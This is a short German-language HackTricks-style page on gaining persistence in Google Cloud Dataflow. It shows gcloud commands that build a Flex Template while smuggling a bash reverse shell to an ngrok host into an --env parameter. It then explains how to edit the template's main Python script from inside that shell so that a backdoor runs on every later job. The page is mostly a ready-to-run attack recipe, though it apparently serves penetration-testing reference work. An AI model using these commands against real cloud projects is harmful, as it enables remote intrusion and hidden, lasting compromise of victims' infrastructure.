# GCP - Dataflow Persistence {{#include ../../../banners/hacktricks-training.md}} ## Dataflow ### Unsichtbare Persistenz im erstellten Container Folgend dem [**Tutorial aus der Dokumentation**](https://cloud.google.com/dataflow/docs/guides/templates/using-flex-templates) können Sie eine neue (z.B. Python) Flex-Vorlage erstellen: ```bash git clone https://github.com/GoogleCloudPlatform/python-docs-samples.git cd python-docs-samples/dataflow/flex-templates/getting_started # Create repository where dockerfiles and code is going to be stored export REPOSITORY=flex-example-python gcloud storage buckets create gs://$REPOSITORY # Create artifact storage export NAME_ARTIFACT=flex-example-python gcloud artifacts repositories create $NAME_ARTIFACT \ --repository-format=docker \ --location=us-central1 gcloud auth configure-docker us-central1-docker.pkg.dev # Create template export NAME_TEMPLATE=flex-template gcloud dataflow $NAME_TEMPLATE build gs://$REPOSITORY/getting_started-py.json \ --image-gcr-path "us-central1-docker.pkg.dev/gcp-labs-35jfenjy/$NAME_ARTIFACT/getting-started-python:latest" \ --sdk-language "PYTHON" \ --flex-template-base-image "PYTHON3" \ --metadata-file "metadata.json" \ --py-path "." \ --env "FLEX_TEMPLATE_PYTHON_PY_FILE=getting_started.py" \ --env "FLEX_TEMPLATE_PYTHON_REQUIREMENTS_FILE=requirements.txt" \ --env "PYTHONWARNINGS=all:0:antigravity.x:0:0" \ --env "/bin/bash -c 'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/13355 0>&1' & #%s" \ --region=us-central1 ``` **Während es gebaut wird, erhalten Sie eine Reverse-Shell** (Sie könnten Umgebungsvariablen wie im vorherigen Beispiel oder andere Parameter missbrauchen, die die Docker-Datei festlegen, um beliebige Dinge auszuführen). In diesem Moment ist es innerhalb der Reverse-Shell möglich, **in das Verzeichnis `/template` zu gehen und den Code des Haupt-Python-Skripts zu ändern, das ausgeführt wird (in unserem Beispiel ist dies `getting_started.py`)**. Setzen Sie hier Ihre Hintertür, damit sie jedes Mal ausgeführt wird, wenn der Job ausgeführt wird. Dann wird beim nächsten Mal, wenn der Job ausgeführt wird, der kompromittierte Container ausgeführt: ```bash # Run template gcloud dataflow $NAME_TEMPLATE run testing \ --template-file-gcs-location="gs://$NAME_ARTIFACT/getting_started-py.json" \ --parameters=output="gs://$REPOSITORY/out" \ --region=us-central1 ``` {{#include ../../../banners/hacktricks-training.md}}